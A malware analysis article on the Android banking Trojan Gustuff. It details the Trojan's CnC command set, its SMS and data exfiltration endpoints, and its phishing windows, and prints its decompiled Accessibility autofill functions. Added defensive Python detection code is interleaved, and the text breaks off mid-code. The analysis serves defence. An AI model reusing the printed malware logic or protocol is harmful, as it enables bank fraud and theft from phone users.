How the Android Trojan Gustuff skims the cream (fiat and crypto) off your accounts


The other day Group-IB reported on the activity of the Android mobile Trojan Gustuff. It works exclusively on international markets, attacking customers of the 100 largest foreign banks, users of 32 mobile crypto wallets, and major e-commerce resources. The developer of Gustuff, however, is a Russian-speaking cybercriminal operating under the nickname Bestoffer. Until recently he praised his Trojan as "a serious product for people with knowledge and experience."

Ivan Pisarev, a malicious code analyst at Group-IB, describes in detail in his research how Gustuff works and what its dangers are.

Who is Gustuff hunting?

Gustuff belongs to a new generation of malware with fully automated functions. According to the developer, the Trojan is a new, improved version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money through phishing web forms disguised as the mobile applications of well-known international banks and payment systems. Bestoffer stated that the rental price of Gustuff Bot was $800 per month.

Analysis of the Gustuff sample showed that the Trojan can target customers using the applications of the largest banks, such as Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, as well as the crypto wallets Bitcoin Wallet, BitPay, Cryptopay, Coinbase, etc.

Originally created as a classic banking Trojan, in its current version Gustuff has significantly expanded its list of potential targets. In addition to the Android applications of banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers, in particular PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.

Entry point: counting on mass infection

Gustuff gets onto Android smartphones through a "classic" vector: SMS messages containing links to APK files. Once an Android device is infected with the Trojan, on command from the server Gustuff can spread further through the contact database of the infected phone or through the server's own database. Gustuff's functionality is designed for mass infection and maximum return for its operators: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which lets the theft of money be accelerated and scaled.

Research on the Trojan showed that the autofill function is implemented using the Accessibility Service, a service intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass the protection against interaction with the window elements of other applications by using this Android service. However, the use of the Accessibility Service in combination with autofill is still rare.

After being downloaded to the victim's phone, Gustuff uses the Accessibility Service to interact with the window elements of other applications (banking, cryptocurrency, online shopping, messaging, etc.) and performs the actions the attackers need. For example, on command from the server the Trojan can press buttons and change the values of text fields in banking applications. Using the Accessibility Service mechanism lets the Trojan bypass the security mechanisms that banks use against the previous generation of mobile Trojans, as well as the security-policy changes Google introduced in newer versions of Android. Gustuff also "knows how" to disable Google Protect: according to the author, this function works in 70% of cases.


Gustuff can also display fake PUSH notifications carrying the icons of legitimate mobile applications. The user taps the PUSH notification and sees a phishing window downloaded from the server, where they enter the requested bank card or crypto wallet data. In another Gustuff scenario, the application on whose behalf the PUSH notification was shown is opened. In that case the malware, on command from the server and using the Accessibility Service, can fill in the fields of the banking application's form for a fraudulent transaction.

Gustuff's functionality also includes sending information about the infected device to the server, reading and sending SMS messages, sending USSD requests, launching a SOCKS5 proxy, following a link, uploading files (including photographed documents, screenshots and photos) to the server, and resetting the device to factory settings.

Malware analysis

Before the malicious application is installed, Android shows the user a window listing the permissions requested by Gustuff:

The application is installed only after the user consents. After launch, the Trojan shows the user a window:

After which it removes its icon.

Gustuff is packed, according to the author, with a packer from FTT. After launch, the application periodically contacts the CnC server to receive commands. Several of the files we examined used the IP address 88.99.171[.]105 as the control server (hereinafter referred to as <%CnC%>).

After launch, the program starts sending messages to the server at http://<%CnC%>/api/v1/get.php.

The response is expected to be JSON in the following format:

{
    "results" : "OK",
    "command":{
        "id": "<%id%>",
        "command":"<%command%>",
        "timestamp":"<%Server Timestamp%>",
        "params":{
            <%Command parameters as JSON%>
        },
    },
}

Each time the application polls the server, it sends information about the infected device. The message format is shown below. Note that the fields full, extra, apps and permission are optional and are sent only when a command from the CnC requests them.

{
    "info":
    {
        "info":
        {
            "cell":<%Sim operator name%>,
            "country":<%Country ISO%>,
            "imei":<%IMEI%>,
            "number":<%Phone number%>,
            "line1Number":<%Phone number%>,
            "advertisementId":<%ID%>
        },
        "state":
        {
            "admin":<%Has admin rights%>,
            "source":<%String%>,
            "needPermissions":<%Application needs permissions%>,
            "accesByName":<%Boolean%>,
            "accesByService":<%Boolean%>,
            "safetyNet":<%String%>,
            "defaultSmsApp":<%Default Sms Application%>,
            "isDefaultSmsApp":<%Current application is Default Sms Application%>,
            "dateTime":<%Current date time%>,
            "batteryLevel":<%Battery level%>
        },
        "socks":
        {
            "id":<%Proxy module ID%>,
            "enabled":<%Is enabled%>,
            "active":<%Is active%>
        },
        "version":
        {
            "versionName":<%Package Version Name%>,
            "versionCode":<%Package Version Code%>,
            "lastUpdateTime":<%Package Last Update Time%>,
            "tag":<%Tag, default value: "TAG"%>,
            "targetSdkVersion":<%Target Sdk Version%>,
            "buildConfigTimestamp":1541309066721
        },
    },
    "full":
    {
        "model":<%Device Model%>,
        "localeCountry":<%Country%>,
        "localeLang":<%Locale language%>,
        "accounts":<%JSON array, contains from "name" and "type" of accounts%>,
        "lockType":<%Type of lockscreen password%>
    },
    "extra":
    {
        "serial":<%Build serial number%>,
        "board":<%Build Board%>,
        "brand":<%Build Brand%>,
        "user":<%Build User%>,
        "device":<%Build Device%>,
        "display":<%Build Display%>,
        "id":<%Build ID%>,
        "manufacturer":<%Build manufacturer%>,
        "model":<%Build model%>,
        "product":<%Build product%>,
        "tags":<%Build tags%>,
        "type":<%Build type%>,
        "imei":<%imei%>,
        "imsi":<%imsi%>,
        "line1number":<%phonenumber%>,
        "iccid":<%Sim serial number%>,
        "mcc":<%Mobile country code of operator%>,
        "mnc":<%Mobile network codeof operator%>,
        "cellid":<%GSM-data%>,
        "lac":<%GSM-data%>,
        "androidid":<%Android Id%>,
        "ssid":<%Wi-Fi SSID%>
    },
    "apps":{<%List of installed applications%>},
    "permission":<%List of granted permissions%>
} 

Storing configuration data

Gustuff stores the information it needs for its operation in a preferences file. The file name, and the names of the parameters in it, are the MD5 sum of the string 15413090667214.6.1<%name%>, where <%name%> is the original name. A Python rendering of the name generation function:

import hashlib

def nameGenerator(input):
    # MD5 of the fixed salt followed by the original name, as a hex string
    return hashlib.md5(("15413090667214.6.1" + input).encode("utf-8")).hexdigest()

Hereinafter we will denote this as nameGenerator(input).
So the name of the preferences file is nameGenerator("API_SERVER_LIST"), and it contains values with the following names:

Variable name                              Meaning
nameGenerator("API_SERVER_LIST")           Contains the list of CnC addresses as an array.
nameGenerator("API_SERVER_URL")            Contains the CnC address.
nameGenerator("SMS_UPLOAD")                Flag, set by default. If the flag is set, SMS messages are sent to the CnC.
nameGenerator("SMS_ROOT_NUMBER")           The phone number to which SMS messages received by the infected device are forwarded. Empty by default.
nameGenerator("SMS_ROOT_NUMBER_RESEND")    Flag, cleared by default. If set, an SMS received by the infected device is forwarded to the root number.
nameGenerator("DEFAULT_APP_SMS")           Flag, cleared by default. If set, the application processes incoming SMS messages.
nameGenerator("DEFAULT_ADMIN")             Flag, cleared by default. If set, the application has administrator rights.
nameGenerator("DEFAULT_ACCESSIBILITY")     Flag, cleared by default. If set, the service that uses the Accessibility Service is running.
nameGenerator("APPS_CONFIG")               A JSON object containing the list of actions to perform when an accessibility event associated with a specific application fires.
nameGenerator("APPS_INSTALLED")            Stores the list of applications installed on the device.
nameGenerator("IS_FIST_RUN")               Flag, reset at first launch.
nameGenerator("UNIQUE_ID")                 Contains a unique identifier. Generated when the bot is launched for the first time.
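To locate and read these obfuscated preferences during forensic analysis of an infected device, the following added Python (not code from the article or from Gustuff) computes the salted MD5 names for the keys listed above and resolves a constructed SharedPreferences XML dump back to plain names; the sample values are made up.

```python
import hashlib
import xml.etree.ElementTree as ET

# Obfuscation scheme described above: every preference name (and the
# preferences file name itself) is md5("15413090667214.6.1" + name).
SALT = "15413090667214.6.1"

# Plain names taken from the table above.
KNOWN_NAMES = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED", "IS_FIST_RUN",
    "UNIQUE_ID",
]


def name_generator(name: str) -> str:
    """Hex MD5 of the salted name, exactly as the Trojan computes it."""
    return hashlib.md5((SALT + name).encode("utf-8")).hexdigest()


def build_resolver(names=KNOWN_NAMES) -> dict:
    """Map hashed preference names back to their plain names."""
    return {name_generator(n): n for n in names}


def resolve_preferences(xml_text: str, names=KNOWN_NAMES) -> dict:
    """Parse a SharedPreferences XML dump and return {plain_name: value}.
    Hashed keys that do not resolve are kept under their hash so nothing
    in the dump is silently dropped."""
    resolver = build_resolver(names)
    root = ET.fromstring(xml_text)
    result = {}
    for elem in root:
        key = elem.get("name")
        if key is None:
            continue
        # <string> keeps its value as text; <boolean>/<int>/<long> use "value".
        value = elem.text if elem.tag == "string" else elem.get("value")
        result[resolver.get(key, key)] = value
    return result


# Constructed sample: a SharedPreferences file as it would look on disk,
# with the keys hashed by the scheme above (all values are made up).
SAMPLE_PREFS = f"""<map>
    <string name="{name_generator('API_SERVER_URL')}">http://cnc.example.invalid/</string>
    <boolean name="{name_generator('SMS_UPLOAD')}" value="true" />
    <boolean name="{name_generator('DEFAULT_ACCESSIBILITY')}" value="false" />
    <string name="{name_generator('UNIQUE_ID')}">0123456789abcdef</string>
    <string name="deadbeef00000000deadbeef00000000">unknown</string>
</map>
"""

if __name__ == "__main__":
    print("preferences file name:", name_generator("API_SERVER_LIST"))
    for key, value in resolve_preferences(SAMPLE_PREFS).items():
        print(f"{key} = {value}")
```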

Module for processing commands from the server

The application stores the CnC server addresses as an array of Base85-encoded strings. The list of CnC servers can be changed when the corresponding command is received, in which case the addresses are saved to the preferences file.

In response to a request, the server sends a command to the application. Note that commands and their parameters are presented in JSON format. The application can process the following commands:

Command              Description
forwardStart         Start sending SMS messages received by the infected device to the CnC server.
forwardStop          Stop sending SMS messages received by the infected device to the CnC server.
ussdRun              Execute a USSD request. The number to which the USSD request is made is in the JSON field "number".
sendSms              Send a single SMS message (if necessary, the message is "split" into parts). As a parameter the command takes a JSON object containing the fields "to" (the destination number) and "body" (the message body).
sendSmsAb            Send SMS messages (split into parts if necessary) to everyone in the contact list of the infected device. The interval between messages is 10 seconds. The message body is in the JSON field "body".
sendSmsMass          Send SMS messages (split into parts if necessary) to the contacts specified in the command parameters. The interval between messages is 10 seconds. As a parameter the command takes a JSON array (field "sms") whose elements contain the fields "to" (the destination number) and "body" (the message body).
changeServer         The command can take as a parameter a value under the key "url", in which case the bot changes the value of nameGenerator("SERVER_URL"), or "array", in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). In this way the application changes the addresses of the CnC servers.
adminNumber          The command is intended for working with the root number. It accepts a JSON object with the following parameters: "number": change nameGenerator("ROOT_NUMBER") to the received value; "resend": change nameGenerator("SMS_ROOT_NUMBER_RESEND"); "sendId": send uniqueID to nameGenerator("ROOT_NUMBER").
updateInfo           Send information about the infected device to the server.
deleteData           The command is intended to delete user data. Depending on the name under which the application was launched, either the data is wiped completely with a reboot of the device (primary user) or only the user data is deleted (secondary user).
socksStart           Launch the Proxy module. The module's operation is described in a separate section.
socksStop            Stop the Proxy module.
openLink             Follow a link. The link is in the JSON parameter under the key "url". "android.intent.action.VIEW" is used to open the link.
uploadAllSms         Send all SMS messages received by the device to the server.
uploadAllPhotos      Send images from the infected device to a URL. The URL comes as a parameter.
uploadFile           Send a file from the infected device to a URL. The URL comes as a parameter.
uploadPhoneNumbers   Send phone numbers from the contact list to the server. If a JSON object with the key "ab" is received as a parameter, the application takes the contact list from the phone book. If a JSON object with the key "sms" is received as a parameter, the application takes the contact list from the senders of SMS messages.
changeArchive        The application downloads a file from the address passed as a parameter under the key "url". The downloaded file is saved under the name "archive.zip". The application then unpacks the file, optionally using the archive password "b5jXh37gxgHBrZhQ4j3D". The unpacked files are saved in the directory [external storage]/hgps. In this directory the application stores its web fakes (described below).
actions              The command is intended for working with the Action Service, described in a separate section.
test                 Does nothing.
download             The command is intended to download a file from a remote server and save it in the "Downloads" directory. The URL and file name come as a parameter, as fields of the JSON parameter object: "url" and "fileName" respectively.
remove               Removes a file from the "Downloads" directory. The file name comes in the JSON parameter under the key "fileName". The default file name is "tmp.apk".
notification         Show a notification with the description and title texts defined by the control server.

Format of the notification command:

{
    "results" : "OK",
    "command":{
        "id": <%id%>,
        "command":"notification",
        "timestamp":<%Server Timestamp%>,
        "params":{
            "openApp":<%Open original app or not%>,
            "array":[
                {"title":<%Title text%>,
                 "desc":<%Description text%>,
                 "app":<%Application name%>}
            ]
        },
    },
}

The notification generated by the examined file looks the same as notifications generated by the application named in the app field. If the openApp field is true, opening the notification launches the application named in the app field. If the openApp field is false, then:

  • A phishing window opens whose content is loaded from the directory <%external storage%>/hgps/<%filename%>
  • A phishing window opens whose content is loaded from the server <%url%>?id=<%Bot id%>&app=<%Application name%>
  • A phishing window opens, disguised as a Google Play card, offering to enter bank card details.

The application sends the result of any command to <%CnC%>set_state.php as a JSON object in the following format:

{
    "command":
    {
        "command":<%command%>,
        "id":<%command_id%>,
        "state":<%command_state%>
    },
    "id":<%bot_id%>
}

ActionsService
The list of commands includes the actions command, which the application processes through this service. When the command is received, the command processing module calls the service to execute the extended command. The service accepts a JSON object as a parameter and can execute the following commands:

1. PARAMS_ACTION: on receiving this command, the service first reads the value of the key type from the JSON parameter, which can be one of the following:

  • serviceInfo: the subcommand reads the value of the key includeNotImportant from the JSON parameter. If the flag is true, the application sets the FLAG_ISOLATED_PROCESS flag on the service that uses the Accessibility Service, so that the service is launched in a separate process.
  • roots: obtain and send to the server information about the currently focused window. The application obtains the information via the AccessibilityNodeInfo class.
  • admin: request administrator rights.
  • delay: suspend the ActionsService for the number of milliseconds given in the parameter under the key "data".
  • windows: send the list of windows visible to the user.
  • install: install an application on the infected phone. The package name of the archive is under the key "fileName". The archive itself is in the Downloads directory.
  • global: the subcommand is intended for navigation from the current window:
    • to the Quick Settings menu
    • back
    • home
    • to notifications
    • to the recently opened applications window

  • launch: launch an application. The application name comes as a parameter under the key data.
  • sound: switch the sound mode to silent.
  • unlock: turns the screen and keyboard backlight on at full brightness. The application does this with a WakeLock, using the string [Application label]:INFO as the tag.
  • permissionOverlay: the function is not implemented (the command execution response is {"message":"not supported"} or {"message":"low sdk"})
  • action: the function is not implemented (the command execution response is {"message":"not supported"} or {"message":"low API"})
  • permissions: this command is meant to request application permissions. However, the request function is not implemented, so the command does nothing. The list of requested permissions comes as a JSON array under the key "permissions". Default list:
    • android.permission.READ_PHONE_STATE
    • android.permission.READ_CONTACTS
    • android.permission.CALL_PHONE
    • android.permission.RECEIVE_SMS
    • android.permission.SEND_SMS
    • android.permission.READ_SMS
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE

  • open: show a phishing window. Depending on the parameter from the server, the application can show the following phishing windows:
    • A phishing window whose content is read from a file in the directory <%external directory%>/hgps/<%param_filename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window whose content is preloaded from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
    • A phishing window disguised as a Google Play card.

  • interactive: the command is intended for interacting with the window elements of other applications through the AccessibilityService. A dedicated service in the program implements the interaction. The examined application can interact with windows that are:
    • Currently active. In this case the parameter contains the id or the text (name) of the object to interact with.
    • Visible to the user at the moment the command is executed. The application selects such windows by id.

    Having obtained the AccessibilityNodeInfo objects for the window elements of interest, the application, depending on the parameters, can perform the following actions:

    • focus: set focus on the object.
    • click: click the object.
    • actionId: perform an action by its ID.
    • setText: change the object's text. The text can be changed in two ways: by performing the ACTION_SET_TEXT action (if the Android version of the infected device is less than or equal to LOLLIPOP), or by placing the string on the clipboard and pasting it into the object (for older versions). This command can be used to change data in a banking application.

2. PARMS_ACTIONS: the same as PARAMS_ACTION, except that an array of JSON commands arrives.

Many readers will probably be interested in what the function for interacting with the window elements of another application looks like. Here is how this functionality is implemented in Gustuff:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    // "repeat": how many times the action is applied to each node (default 1)
    int repeat = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;  // number of actions that performAction() reported as successful
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= repeat) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    // 1 == AccessibilityNodeInfo.ACTION_FOCUS
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    // 16 == AccessibilityNodeInfo.ACTION_CLICK
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    // arbitrary action id chosen by the server
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == repeat) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    // the number of successful actions is reported back to the server
    res.addPropertyNumber("res", Integer.valueOf(count));
    return count > 0;  // return value is not visible in the decompiled listing; assumed
}

The function that changes the text:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build.VERSION.SDK_INT >= 21) {
        // Android 5.0 and later: set the text directly through ACTION_SET_TEXT
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        // Older versions: put the string on the clipboard and paste it into the node
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
            ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
            result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

So, with the control server configured correctly, Gustuff is able to fill in the text fields of a banking application and press the buttons needed to complete a transaction. The Trojan does not even need to log in to the application: it is enough to send a command to show a PUSH notification and then open the banking application that is already installed. The user authenticates themselves, after which Gustuff can perform the autofill.

SMS message processing module

The application installs an event handler for SMS messages received by the infected device. The examined application can receive commands from the operator in the body of an SMS message. Commands arrive in the format:

7!5=<%Base64-encoded command%>

The application searches every incoming SMS message for the string 7!5=; when the string is found, it decodes the Base64 starting at offset 4 and executes the command. The commands are the same as those from the CnC. The execution result is sent to the number the command came from. Response format:

7*5=<%Base64 encode of “result_code command”%>
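An added Python example, not from the article, that applies the 7!5= / 7*5= framing above as a detector over constructed SMS bodies: it decodes the Base64 that follows the marker, parses the command, and also builds and decodes the reply format. The JSON shape of the command inside the SMS is an assumption; only the markers and the Base64 layout are as described.

```python
import base64
import json
import re

CMD_MARKER = "7!5="   # operator command marker inside an SMS body
RESP_MARKER = "7*5="  # marker of the bot's reply SMS
_B64 = re.compile(r"[A-Za-z0-9+/]+=*")


def _decode_after(marker: str, body: str):
    """Find `marker` in `body` and Base64-decode the run that follows it
    (offset len(marker) == 4 from the match). Returns str or None."""
    idx = body.find(marker)
    if idx < 0:
        return None
    m = _B64.match(body, idx + len(marker))
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(0), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_sms_command(body: str):
    """Return the decoded command carried by an SMS (parsed as JSON when
    possible, otherwise the raw string), or None for ordinary messages."""
    raw = _decode_after(CMD_MARKER, body)
    if raw is None:
        return None
    try:
        return json.loads(raw)
    except json.JSONDecodeError:
        return raw


def encode_response(result_code: int, command: str) -> str:
    """Build the reply the bot sends back: 7*5= + Base64("result_code command")."""
    payload = f"{result_code} {command}".encode("utf-8")
    return RESP_MARKER + base64.b64encode(payload).decode("ascii")


def decode_response(body: str):
    """Inverse of encode_response: (result_code, command) or None."""
    raw = _decode_after(RESP_MARKER, body)
    if raw is None or " " not in raw:
        return None
    code, command = raw.split(" ", 1)
    return (int(code), command) if code.lstrip("-").isdigit() else None


def scan_sms(messages):
    """Over (sender, body) pairs, report every message that is a command or
    a reply on this covert channel; ordinary SMS are skipped."""
    hits = []
    for sender, body in messages:
        cmd = extract_sms_command(body)
        if cmd is not None:
            hits.append((sender, "command", cmd))
            continue
        resp = decode_response(body)
        if resp is not None:
            hits.append((sender, "reply", resp))
    return hits


# Constructed sample traffic (numbers and texts are made up). The JSON
# inside the command is assumed; the marker framing is from the article.
SAMPLE_SMS = [
    ("+15550001111", "Your parcel is waiting, see tracking info."),
    ("+15550002222", "hi " + CMD_MARKER
        + base64.b64encode(b'{"command":"updateInfo","params":{}}').decode()),
    ("+15550003333", encode_response(0, "updateInfo")),
]

if __name__ == "__main__":
    for hit in scan_sms(SAMPLE_SMS):
        print(hit)
```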

Optionally, the application can forward all received messages to the root number. For this, the root number must be specified in the preferences file and the message forwarding flag must be set. The SMS message is sent to the attacker's number in the format:

<%From number%> - <%Time, format: dd/MM/yyyy HH:mm:ss%> <%SMS body%>

Also optionally, the application can send messages to the CnC. The SMS message is sent to the server in JSON format:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

If the flag nameGenerator("DEFAULT_APP_SMS") is set, the application stops further processing of the SMS message and clears the incoming message list.

Proxy module

The examined application contains a Backconnect Proxy module (hereinafter the Proxy module), which has a separate class holding static fields with the configuration. The configuration data is stored in the sample in clear text.

All actions performed by the Proxy module are logged to files. For this, the application creates a directory in External Storage named "logs" (the ProxyConfigClass.logsDir field of the configuration class), where the log files are kept. Logging goes to files with the following names:

  1. main.txt: the work of the class named CommandServer is logged to this file. Hereinafter, logging a string to this file is denoted mainLog(str).
  2. session-<%id%>.txt: this file holds the log data associated with a specific proxy session. Hereinafter, logging a string to this file is denoted sessionLog(str).
  3. server.txt: this file receives all data written to the files described above.

Log data format:

<%Date%> [Thread[<%thread id%>], id[]]: log-string

Exceptions that occur while the Proxy module is running are also logged to the file. For this, the application generates a JSON object in the following format:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

It then converts it to its string representation and logs it.

The Proxy module is launched after the corresponding command is received. When the command to launch the Proxy module arrives, the application starts a service named MainService, which is responsible for managing the Proxy module: starting and stopping it.

Service startup stages:

1. It starts a timer that fires once a minute and checks whether the Proxy module is active. If the module is not active, it starts it.
The Proxy module is also launched when the android.net.conn.CONNECTIVITY_CHANGE event fires.

2. The application creates a wake-lock with the PARTIAL_WAKE_LOCK parameter and holds it. This prevents the device's CPU from entering sleep mode.

3. It launches the Proxy module's command processing class, first logging the line mainLog("start server") and

Server::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

where proxy_cnc, command_port and proxy_port are parameters taken from the proxy server configuration.

The command processing class is named CommandConnection. Immediately after starting, it performs the following actions:

4. Connects to ProxyConfigClass.host:ProxyConfigClass.commandPort and sends data about the infected device there in JSON format:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Where:

  • id: the identifier; the module tries to read the value of the field "id" from the Shared Preferences file named "x". If the value is not found, it generates a new one. So the Proxy module has its own identifier, generated the same way as the Bot ID.
  • imei: the device's IMEI. If an error occurs while obtaining the value, the error message text is written in this field instead.
  • imsi: the device's International Mobile Subscriber Identity. If an error occurs while obtaining the value, the error message text is written in this field instead.
  • model: the end-user-visible name of the end product.
  • manufacturer: the manufacturer of the product/hardware (Build.MANUFACTURER).
  • androidVersion: a string in the format "<%release_version%> (<%os_version%),<%sdk_version%>"
  • country: the phone's current locale.
  • partnerId: an empty string.
  • packageName: the package name.
  • networkType: the type of the current network connection (for example "WIFI", "MOBILE"). On error, null is returned.
  • hasGsmSupport: true if the phone supports GSM, otherwise false.
  • simReady: SIM card status.
  • simCountry: ISO country code (based on the SIM card provider).
  • networkOperator: the operator name. If an error occurs while obtaining the value, the error message text is written in this field instead.
  • simOperator: the Service Provider Name (SPN). If an error occurs while obtaining the value, the error message text is written in this field instead.
  • version: this field is stored in the configuration class; in the examined versions of the bot it was equal to "1.6".

5. Switches to waiting for commands from the server. Commands from the server arrive in the following format:

  • offset 0 – command
  • offset 1 – sessionId
  • offset 2 – length
  • offset 4 – data

When a command arrives, the application writes to the log:
mainLog("Header { sessionId[<%id%>], type[<%command%>], length[<%length%>] }")

The following commands from the server are possible:

Name          Command  Data           Description
connectionId  0        connection ID  Create a new connection
SLEEP         3        time           Pause the proxy module
PING_PONG     4        -              Send a PONG message

The PONG message consists of 4 bytes and looks like this: 0x04000000.
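As an added example (not code from the article or from the malware), a decoder for this frame format as an analyst might apply it to captured proxy-module traffic. The two-byte length field is assumed to be big-endian, which the article does not specify; the sample stream is constructed.

```python
import struct
from dataclasses import dataclass
from typing import Iterator, Tuple

# Command codes from the table above; anything else is unknown to the decoder.
COMMANDS = {0: "connectionId", 3: "SLEEP", 4: "PING_PONG"}
# Header: command (offset 0), sessionId (offset 1), 2-byte length (offset 2);
# big-endian length is an ASSUMPTION, the article gives no byte order.
HEADER = struct.Struct(">BBH")

@dataclass
class Frame:
    command: int
    session_id: int
    data: bytes

def parse_frame(buf: bytes) -> Tuple[Frame, int]:
    """Decode the frame at the start of buf; return it and the bytes consumed.
    Raises ValueError when the header is short or length runs past the end."""
    if len(buf) < HEADER.size:
        raise ValueError("truncated header")
    command, session_id, length = HEADER.unpack_from(buf)
    end = HEADER.size + length
    if end > len(buf):
        raise ValueError(f"declared length {length} exceeds buffer")
    return Frame(command, session_id, buf[HEADER.size:end]), end

def iter_frames(stream: bytes) -> Iterator[Frame]:
    """Walk a captured stream of back-to-back frames (data starts at offset 4)."""
    pos = 0
    while pos < len(stream):
        frame, used = parse_frame(stream[pos:])
        yield frame
        pos += used

def is_well_formed(buf: bytes) -> bool:
    """True when buf holds exactly one complete frame, nothing more or less."""
    try:
        return parse_frame(buf)[1] == len(buf)
    except ValueError:
        return False

def build_pong() -> bytes:
    """The 4-byte PONG reply shown in the article as 0x04000000."""
    return HEADER.pack(4, 0, 0)

# Constructed sample stream: connectionId with id 0x2a, SLEEP with ASCII "30",
# then a PING_PONG with no payload.
SAMPLE = bytes.fromhex("00 01 00 01 2a" "03 01 00 02 33 30" "04 00 00 00")
```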

When the connectionId command (create a new connection) is received, CommandConnection creates an instance of the ProxyConnection class.

  • Two classes take part in proxying: ProxyConnection and end. On creation, ProxyConnection connects to the address ProxyConfigClass.host:ProxyConfigClass.proxyPort and sends the JSON object:

{
    "id":<%connectionId%>
}

In response, the server sends a SOCKS5 message containing the address of the remote server with which the connection should be established. Communication with that server is handled by the end class. The connection setup can be represented schematically as follows:

[Figure: proxy connection setup scheme]

Network interaction

To hinder traffic analysis with network sniffers, communication between the CnC server and the application can be protected with the SSL protocol. All data transmitted to and from the server is presented in JSON format. During operation the application makes the following requests:

  • http://<%CnC%>/api/v1/set_state.php – the result of command execution.
  • http://<%CnC%>/api/v1/get.php – obtaining a command.
  • http://<%CnC%>/api/v1/load_sms.php – uploading SMS messages from the infected phone.
  • http://<%CnC%>/api/v1/load_ab.php – uploading the contact list from the infected device.
  • http://<%CnC%>/api/v1/aevents.php – a request made when the parameters stored in the preferences file are updated.
  • http://<%CnC%>/api/v1/set_card.php – uploading data obtained through the phishing window that poses as Google Play Market.
  • http://<%CnC%>/api/v1/logs.php – uploading log data.
  • http://<%CnC%>/api/v1/records.php – uploading data obtained through phishing windows.
  • http://<%CnC%>/api/v1/set_error.php – notification of an error that occurred.
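Added example, not code from the article: detection logic that runs the request list above over constructed web-proxy log lines (the log format, host names and client addresses are made up) and only flags a client once it has touched several distinct Gustuff paths, because a path name like get.php on its own is too common to be conclusive.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Endpoint -> purpose, both taken from the request list above.
GUSTUFF_API = {
    "set_state.php": "result of command execution",
    "get.php": "command retrieval",
    "load_sms.php": "SMS upload from the infected phone",
    "load_ab.php": "contact-list upload",
    "aevents.php": "preferences-file parameter update",
    "set_card.php": "card data from the fake Google Play window",
    "logs.php": "log upload",
    "records.php": "data from phishing windows",
    "set_error.php": "error notification",
}

def classify_url(url):
    """Purpose of the matching Gustuff endpoint, else None. Only the path is
    compared, so the CnC host need not be known; query strings are ignored."""
    prefix, _, name = urlsplit(url).path.rpartition("/")
    return GUSTUFF_API.get(name) if prefix == "/api/v1" else None

def scan_log(lines):
    """Return (client_ip, path, purpose) for each line hitting the API; the
    constructed log format is "<time> <client_ip> <method> <url> <status>"."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # unparseable line: skip rather than guess
        purpose = classify_url(fields[3])
        if purpose:
            hits.append((fields[1], urlsplit(fields[3]).path, purpose))
    return hits

def suspicious_clients(hits, min_distinct=2):
    """Names such as get.php are common on the web, so one hit is a weak
    signal; require several distinct Gustuff paths from the same client."""
    by_client = defaultdict(set)
    for client, path, _ in hits:
        by_client[client].add(path)
    return sorted(c for c, p in by_client.items() if len(p) >= min_distinct)

# Constructed sample lines; hosts and addresses are placeholders.
SAMPLE_LOG = [
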